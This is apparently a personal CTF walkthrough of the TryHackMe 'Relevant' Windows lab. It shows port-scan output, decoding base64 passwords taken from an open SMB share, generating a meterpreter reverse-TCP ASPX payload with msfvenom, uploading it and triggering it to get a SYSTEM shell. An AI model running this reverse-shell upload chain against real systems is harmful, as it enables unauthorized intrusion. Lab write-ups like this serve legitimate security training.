TryHackMe - Relevant
1. Enumeration
-
Rustscan w/Nmap
PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-IIS/10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ssl/ms-wbt-server? syn-ack | ssl-cert: Subject: commonName=Relevant | Issuer: commonName=Relevant | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2022-03-17T01:15:08 | Not valid after: 2022-09-16T01:15:08 | MD5: 42a4 a8c4 a4d5 43af 1f7e e6a7 88fe 4373 | SHA-1: 2a2c 5af2 116e 6673 7a55 c523 3c37 0cf2 3eeb c089 | -----BEGIN CERTIFICATE----- | MIIC1DCCAbygAwIBAgIQEkeU/ZJCmK9J6QDJRpgLmDANBgkqhkiG9w0BAQsFADAT | MREwDwYDVQQDEwhSZWxldmFudDAeFw0yMjAzMTcwMTE1MDhaFw0yMjA5MTYwMTE1 | MDhaMBMxETAPBgNVBAMTCFJlbGV2YW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A | MIIBCgKCAQEA7ahxwPyNn7Abaj+oCzoOo83ho2xv4Oa7t0vA1uNos5FliGRzjEIg | MR2goaz7E8tkbU3yawvx/v6/DUxsIkOu6J4Ls/VI3BBMxeE/1GbC0OSlLEoeIe88 | iPzXLcZy4lmC5Bk54T3XS6NPBFDU0ut/cjr4XyFcY1ah5A3D4sDZkQFCeR0slOTQ | QzyCDPsF3VwTWT7lCBDpFAq2KKFQd7pF/kopJc8qZqr2BPHJIu5tKxNIuaR9AFml | OHsr4F9XLAXjj/kRu18P68Zl37xFAyGg/dD1fvEADcShCtFA4Zx2xm7sUMrS2cIq | PTUo6uznY58MQLL3u9+RWvpX56/T7MrEiQIDAQABoyQwIjATBgNVHSUEDDAKBggr | BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAKXimMiHwlcM | 7KZmUN40eayEpReWmcx/so+zon7+bIIQNLktZZKqEEP1NPAODAdgsNsvP6s/3tuI | 4m6/IAgQZAFXEHQ9GZ5S6rjZCA7B0YpZ5kqC1NQUWAzgFiN0gB62tPHGKtDm6n1u | Mg97IlQrfvECo6ktKIF4fGVyzdyIHUD9TY/itfi0RylTvVpjauwO3TSv+Q147A7l | 2a+jlMWATm0yLYzbw2kT87HjpA7gNKu5IHk/fALDE+n7L2UdjqPsTP3Supto1HWm | MRhyAgri2sHL7cysJ0CjXh7JEMOobyBeiAvkYOVagfCCS42GlTyIOCNg1fU7zBMd | Iek/wk6cZVw= |_-----END CERTIFICATE----- |_ssl-date: 2022-03-18T01:28:58+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: RELEVANT | NetBIOS_Domain_Name: RELEVANT | NetBIOS_Computer_Name: RELEVANT | DNS_Domain_Name: Relevant | DNS_Computer_Name: Relevant | Product_Version: 10.0.14393 |_ System_Time: 2022-03-18T01:28:19+00:00 49663/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE 49668/tcp open msrpc syn-ack Microsoft Windows RPC 49669/tcp open msrpc syn-ack Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 12736/tcp): CLEAN (Timeout) | Check 2 (port 22316/tcp): CLEAN (Timeout) | Check 3 (port 31614/udp): CLEAN (Timeout) | Check 4 (port 23888/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_clock-skew: mean: 1h24m00s, deviation: 3h07m52s, median: 0s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb2-time: | date: 2022-03-18T01:28:21 |_ start_date: 2022-03-18T01:15:08 | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-03-17T18:28:22-07:00 -
Gobuster
- No results
2. SMB
- Connect to SMB share
└─$ smbclient //10.10.201.49/nt4wrksv Enter WORKGROUP\acousticgirl's password: Try "help" to get a list of possible commands. smb: \> ls -la NT_STATUS_NO_SUCH_FILE listing \-la smb: \> ls . D 0 Sat Jul 25 17:46:04 2020 .. D 0 Sat Jul 25 17:46:04 2020 passwords.txt A 98 Sat Jul 25 11:15:33 2020 7735807 blocks of size 4096. 5138781 blocks available - Download passwords.txt
smb: \> get passwords.txt getting file \passwords.txt of size 98 as passwords.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) - Decode entries in passwords.txt
┌──(acousticgirl㉿kali)-[~/CTF/THM/relevant] └─$ cat passwords.txt [User Passwords - Encoded] Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk ┌──(acousticgirl㉿kali)-[~/CTF/THM/relevant] └─$ echo 'Qm9iIC0gIVBAJCRXMHJEITEyMw==' | base64 -d Bob - !P@$$W0rD!123 ┌──(acousticgirl㉿kali)-[~/CTF/THM/relevant] └─$ echo 'QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk' | base64 -d Bill - Juw4nnaM4n420696969!$$$
3. Gaining Shell
- Use
msfvenomto craft a payload to upload to the SMB share┌──(acousticgirl㉿kali)-[~/CTF/THM/relevant] └─$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.6.8.143 lport=4444 -f aspx -o pwn.aspx - Upload file to SMB
└─$ smbclient //10.10.234.85/nt4wrksv Enter WORKGROUP\acousticgirl's password: Try "help" to get a list of possible commands. smb: \> mput pwn2.aspx Put file pwn.aspx? y putting file pwn.aspx as \pwn2.aspx (750.4 kb/s) (average 750.4 kb/s) smb: \> exit - Start Meterpreter Handler
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp - Activate malicious .aspx file
└─$ curl http://10.10.234.85:49663/nt4wrksv/pwn.aspx -
Enter Command Shell
meterpreter > sessions 11 meterpreter > shell Process 3628 created. Channel 1 created. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami nt authority\system - SUCCESS!! You are now in as NT Authority\SYSTEM user
4. User Flag
```
c:\Users\Bob\Desktop>type user.txt
```
5. Root Flag
```
c:\Users\Administrator\Desktop>type root.txt
```
Tags:
THM CTF SMB
Written on March 17, 2022